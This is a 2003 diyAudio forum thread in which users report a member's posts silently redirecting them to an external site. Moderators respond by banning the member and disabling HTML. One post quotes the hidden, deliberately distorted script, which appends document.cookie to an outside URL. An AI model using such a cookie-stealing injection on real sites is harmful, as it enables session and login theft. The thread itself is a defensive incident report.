What the "hack" is this?

Netlist · 2003-06-16 7:36 pm

Clicking on a thread which contains a post from programx, I get redirected to http://members.lycos.nl/protect0rzg...1142; Bericht2=http://www.diyaudio.com/forums
This seems to reveal quite a lot of my personal information.
Looking at the posts from programx you see nothing, but in this list a strange script appears.
Is this normal or is this only a test from programx or the moderators or the board software.
http://diyaudio.com/forums/search.php?action=showresults&searchid=259833
/Hugo

dhaen · 2003-06-16 7:52 pm

Same here. I thought it was a problem at my end.... :scratch:

dhaen · 2003-06-16 7:55 pm

Could it be this bit of invisible code in his posts:

<s********ript>window.open('http://members.lycos.nl/protect0rzgame/1.php?Bericht='+document.cookie+'&Bericht2=http://www.diyaudio.com/forums');</scr****ipt></font></p>

(script commands have been deliberately distorted to save replication)

Maybe the moderators should be more careful....

jleaman · 2003-06-16 8:18 pm

every time i click on a link i get spamed with posting's

AudioFreak · 2003-06-16 8:55 pm

Thanks for bringing my attention to this. Programx has been banned pending investigation. It is hard to tell the extent of the information stolen from a user when redirected to that script but there are good odds that complete login details have been stolen. Anyone who thinks they may have been affected should change their password as a matter of urgency. On behalf of the forum, its administrative team, the moderators and the site owner I would like to state once and for all that this was none of our doing.

Netlist · 2003-06-16 9:17 pm

AudioFreak said:
On behalf of the forum, its administrative team, the moderators and the site owner I would like to state once and for all that this was none of our doing.

Thanks AudioFreak
Of course it was never my intention to accuse the mods.
I have a rather high S/N ratio in feeling when something is wrong.

IMHO, the name "programx" and the location "test" was a good indication.
A real smart guy would have done better

/Hugo

dhaen · 2003-06-16 9:25 pm

Just a thought,

Was it wise to put through so many posts that had zero contibution? Stinks like a rat :darkside:

pinkmouse · 2003-06-16 9:35 pm

dhaen said:
Just a thought,

Was it wise to put through so many posts that had zero contibution? Stinks like a rat

Believe it or not, us mods don't censor much, and we always err on the side of letting things through. Although we try to keep as tight a ship as possible, sometimes these things just slip through the cracks , sorry.

As AF said above, one of the best things you can do for your own security and peace of mind is regularly change your passwords, and this applies not just to diyAudio, but the 'net in general.

Jason · 2003-06-17 3:41 am

HTML has been disabled across the board to prevent this happening again. Sorry if it breaks some older posts using image tags etc.

Allowing HTML in posts is sadly in this day and age really limited to intranet applications, where theives do not roam freely.

dhaen · 2003-06-17 8:15 am

Disabled html

It's a shame really, but I suppose it was a bomb waiting to be ignited.
Thank you, I feel safer now.

Search

Amplifiers

Source & Line

Loudspeakers

Design & Build

General Interest

Live Sound

Member Areas

Site

Featured Vendors

Members Market

Vendors Market

Vendors

Search

What the "hack" is this?

Netlist

More options

dhaen

More options

dhaen

More options

jleaman

Attachments

More options

AudioFreak

More options

Netlist

More options

dhaen

More options

pinkmouse

More options

Jason

More options

dhaen

More options

What the "hack" is this?

Moderator

Ex-Moderator

Ex-Moderator

Banned

Attachments

On Holiday

Moderator

Ex-Moderator

Ex-Moderator

Switches things on and off again

Ex-Moderator